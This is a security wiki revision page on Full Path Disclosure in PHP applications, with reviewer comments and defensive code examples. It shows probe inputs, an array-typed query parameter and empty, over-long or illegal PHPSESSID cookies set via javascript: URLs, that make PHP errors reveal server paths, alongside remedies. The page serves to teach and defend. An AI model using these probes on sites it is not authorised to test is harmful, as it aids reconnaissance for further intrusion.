Difference between revisions of "Full Path Disclosure"
Jakub Vrána (talk | contribs) (Promote display_errors)
(Added paragraph for "Invalid Session Cookies")
Line 27: | Line 27: | ||
'''Null Session Cookie''' | '''Null Session Cookie''' | ||
− | Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using | + | Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using JavaScript Injections. |
A simple injection using this method would look something like so: | A simple injection using this method would look something like so: | ||
<pre>javascript:void(document.cookie="PHPSESSID=");</pre> | <pre>javascript:void(document.cookie="PHPSESSID=");</pre> | ||
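Review bot: the completed sentence in this hunk now says the nulled session is produced "using JavaScript Injections", but the `javascript:void(document.cookie="PHPSESSID=");` line right after it is the tester setting a cookie in their own browser, not anything injected into the application. Suggest "by setting the session cookie from the browser, for example via a javascript: URL" so the page does not read as if XSS were involved.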
Line 38: | Line 38: | ||
Errors can contain useful information for site owner so instead of disabling the error reporting at all, it is possible to only hide errors from output by [http://www.php.net/errorfunc.configuration#ini.display-errors display_errors]. | Errors can contain useful information for site owner so instead of disabling the error reporting at all, it is possible to only hide errors from output by [http://www.php.net/errorfunc.configuration#ini.display-errors display_errors]. | ||
+ | '''Invalid Session Cookie''' | ||
+ | |||
+ | As a complement to the Null Session Cookie, a very long session could also produce an error containing FPD. | ||
+ | This could also be accomplished using a JavaScript injection like so: | ||
+ | <pre>javascript:void(document.cookie='PHPSESSID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');</pre> | ||
+ | By simply setting the PHPSESSID cookie to 129 bytes or more, PHP may spit out a warning. | ||
+ | |||
+ | Another approach would be to to set the PHPSESSID cookie data to one of the reserved bytes. | ||
+ | <pre>javascript:void(document.cookie='PHPSESSID=.');</pre> | ||
+ | |||
+ | Both variants result in the following. | ||
+ | <pre>Warning: session_start(): The session id is too long or contains illegal characters, | ||
+ | valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre> | ||
+ | |||
+ | The same remedy as for Null Session Cookie may be applied here. | ||
+ | Errors may be hidden from the output by [http://www.php.net/errorfunc.configuration#ini.display-errors display_errors]. | ||
'''Direct Access to files that requires preloaded library files''' | '''Direct Access to files that requires preloaded library files''' |
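Review bot: "to set the PHPSESSID cookie data to one of the reserved bytes" does not match the warning quoted a few lines later, which states the valid set is a-z, A-Z, 0-9, '-' and ','; the '.' in the second `<pre>` is simply outside that set, so suggest "a character outside the permitted set, such as a period". The same sentence has a doubled "to to". The closing two lines repeat the remedy already given under Null Session Cookie (error_reporting(0) / display_errors); a one-line cross-reference would be enough.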
Revision as of 17:06, 18 July 2012
- This is an Attack. To view all attacks, please see the Attack Category page.
Last revision: 07/18/2012
Description
Full Path Disclosure (FPD) vulnerabilities let the attacker see the filesystem path to the webroot or to a file, e.g. /home/omg/htdocs/file/. Certain attacks, such as using load_file() inside a SQL injection to read page source, require the attacker to know the full path of the file they wish to read.
Risk Factors
TBD
Examples
Empty Array
If we have a site that uses a method of requesting a page like this:
http://site.com/index.php?page=about
Turning the parameter into an array by appending opening and closing square brackets makes the page output an error. The request looks like this:
http://site.com/index.php?page[]=about
The page now fails and emits a warning that includes the absolute path of the script:
Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131
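A hardened form of the index.php?page=... dispatcher described above, added here as an example (not code from this page or from any particular project); it assumes content pages live as ./pages/<name>.php next to index.php:

```php
<?php
// Added example (not code from the OWASP page): a hardened form of the
// index.php?page=... dispatcher from the Empty Array section. Assumed
// layout: content pages live as ./pages/<name>.php next to this file.
declare(strict_types=1);

// Keep warnings out of the response body; they still reach the server log.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Vulnerable original pattern, for contrast:
//   opendir('pages/' . $_GET['page']);
// With ?page[]=about, $_GET['page'] is an array, string conversion yields
// "Array", and opendir() warns with the script's absolute path.

const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Map the raw query value to an allow-listed page name, or null if the
 * value is missing, not a string, or not in the list.
 */
function resolve_page($raw): ?string
{
    if (!is_string($raw)) {          // rejects ?page[]=about outright
        return null;
    }
    return in_array($raw, ALLOWED_PAGES, true) ? $raw : null;
}

$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    // Log the rejected input for the admin; tell the client nothing useful.
    error_log('index.php: rejected page parameter ' . json_encode($_GET['page'] ?? null));
    http_response_code(400);
    exit('Bad request');
}
require __DIR__ . '/pages/' . $page . '.php';
```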
Null Session Cookie
Another popular and very reliable method of producing errors containing an FPD is to give the page a nulled session cookie, set from the browser with JavaScript. A simple injection using this method looks like this:
javascript:void(document.cookie="PHPSESSID=");
By setting the PHPSESSID cookie to an empty (null) value we get an error:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
This vulnerability is prevented simply by turning error reporting off so that your code does not output errors:
error_reporting(0);
Errors contain useful information for the site owner, so instead of disabling error reporting altogether, it is possible to hide only the error output from the response with display_errors.
Invalid Session Cookie
As a complement to the Null Session Cookie, a very long session id can also produce an error containing an FPD. This can likewise be accomplished with a JavaScript injection like so:
javascript:void(document.cookie='PHPSESSID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
By setting the PHPSESSID cookie to 129 bytes or more, PHP may emit a warning.
Another approach is to set the PHPSESSID cookie to a character outside the permitted set, such as a period:
javascript:void(document.cookie='PHPSESSID=.');
Both variants result in the following warning:
Warning: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
The same remedy as for the Null Session Cookie applies here: errors can be hidden from the output with display_errors.
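An added example (not code from this page) that covers both the Null Session Cookie and Invalid Session Cookie cases: the session cookie is validated against the alphabet and length the quoted warning names before session_start() runs, and any warning that still occurs is logged rather than displayed. The error_log path is an assumption.

```php
<?php
// Added example (not code from the OWASP page). Validates the session
// cookie before session_start(), so the empty, over-long and
// illegal-character PHPSESSID values shown in the Null Session Cookie
// and Invalid Session Cookie sections never reach the session handler,
// and routes any warning that still occurs to the log instead of the page.
declare(strict_types=1);

ini_set('display_errors', '0');               // never echo "in /path on line N"
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app.log'); // assumed log location

// Allowed alphabet and length are taken from the warning quoted above:
// a-z, A-Z, 0-9, '-' and ','; 129 bytes or more triggers it, so the
// check accepts 1..128 characters.
function is_valid_session_id($sid): bool
{
    return is_string($sid) && preg_match('/^[A-Za-z0-9,-]{1,128}$/', $sid) === 1;
}

// Last line of defence: any warning that still fires is written to the
// log with its file and line, and returning true stops PHP's default
// handler from rendering it into the response.
set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool {
    error_log(sprintf('[%d] %s in %s:%d', $errno, $errstr, $errfile, $errline));
    return true;
});

$name = session_name();                       // "PHPSESSID" unless reconfigured
if (isset($_COOKIE[$name]) && !is_valid_session_id($_COOKIE[$name])) {
    // Discard the bad cookie: session_start() then issues a fresh id
    // instead of complaining about the supplied one.
    error_log('Rejected session cookie: ' . json_encode($_COOKIE[$name]));
    unset($_COOKIE[$name]);
    setcookie($name, '', time() - 3600, '/');
}
session_start();
```

Setting session.use_strict_mode=1 in php.ini additionally makes PHP refuse any session id it did not issue itself, independent of the check above.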
Direct Access to files that require preloaded library files
Web application developers sometimes fail to add safety checks to files that require preloaded library/function files. Such files are prone to reveal sensitive information when their URLs are requested directly. Sometimes this is also a clue to a Local File Inclusion vulnerability.
Concerning Mambo CMS, if we directly request the URL http://site.com/mambo/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php, we get:
Fatal error: Class 'SpellChecker' not found in /home/victim/public_html/mambo/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php on line 9
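The guard such a library file needs, added here as an example (not Mambo's code or code from this page); APP_LOADED is a hypothetical constant assumed to be defined by the front controller before it requires any library file:

```php
<?php
// Added example, not Mambo's or the OWASP page's code. Shows the guard
// a library file such as classes/PSpellShell.php needs so that a direct
// request does not die with "Class 'SpellChecker' not found in <path>".
// Assumed: the front controller defines APP_LOADED (hypothetical name)
// before requiring any library file.

// ---- index.php (front controller), for context ----
//   define('APP_LOADED', true);
//   require __DIR__ . '/classes/SpellChecker.php';
//   require __DIR__ . '/classes/PSpellShell.php';

// ---- classes/PSpellShell.php ----
if (!defined('APP_LOADED')) {
    // Reached only on a direct request: stop before the class statement
    // below, which is what raised the fatal error with the absolute path.
    http_response_code(403);
    exit('Direct access to this file is not allowed.');
}
if (!class_exists('SpellChecker', false)) {
    // Bootstrap ran but forgot the parent class: log it for the admin
    // (the path goes to the log, not the response) and fail generically.
    error_log('SpellChecker must be loaded before ' . __FILE__);
    http_response_code(500);
    exit('Server configuration error.');
}

class PSpellShell extends SpellChecker
{
    // spell-checking methods unchanged; omitted here
}
```

Denying web access to the classes directory at the web server, or keeping library files outside the document root, removes the exposure regardless of whether every file carries the guard.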
Tool
The above three checks can be performed with the aid of the inspathx tool.
Related Threat Agents
Related Attacks
Related Vulnerabilities
- None
Related Controls
- Error Handling
- Bounds Checking
- Safe Libraries
- Static Code Analysis
- Executable space protection
- Address space layout randomization (ASLR)
- Stack-smashing Protection (SSP)